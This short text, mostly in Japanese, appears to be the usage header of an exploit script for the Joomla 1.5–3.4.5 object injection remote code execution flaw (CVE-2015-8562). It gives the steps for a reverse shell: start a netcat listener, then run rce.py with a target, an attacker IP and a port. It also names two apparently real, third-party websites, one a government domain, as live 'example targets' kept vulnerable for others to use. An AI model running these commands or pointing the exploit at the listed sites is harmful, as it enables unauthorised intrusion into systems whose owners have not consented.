
Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
エクスプロイト: Joomla 1.5 - 3.4.5 オブジェクトインジェクション RCE X-Forwarded-For ヘッダー:
脆弱性発見日: 12/17/2015
エクスプロイト作者: anarc0der
バージョン: Joomla 1.5 から 3.4.5
CVE : CVE-2015-8562
使い方:
ターミナルを1つ開き、ncで待ち受け: $ nc -lnvp 4444
別のターミナルを開き、エクスプロイトを実行:
python3 rce.py --target='target' --ip='ip' --port=4444
ターゲット例 PoC (壊さないでください。他の人が例として使うため):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/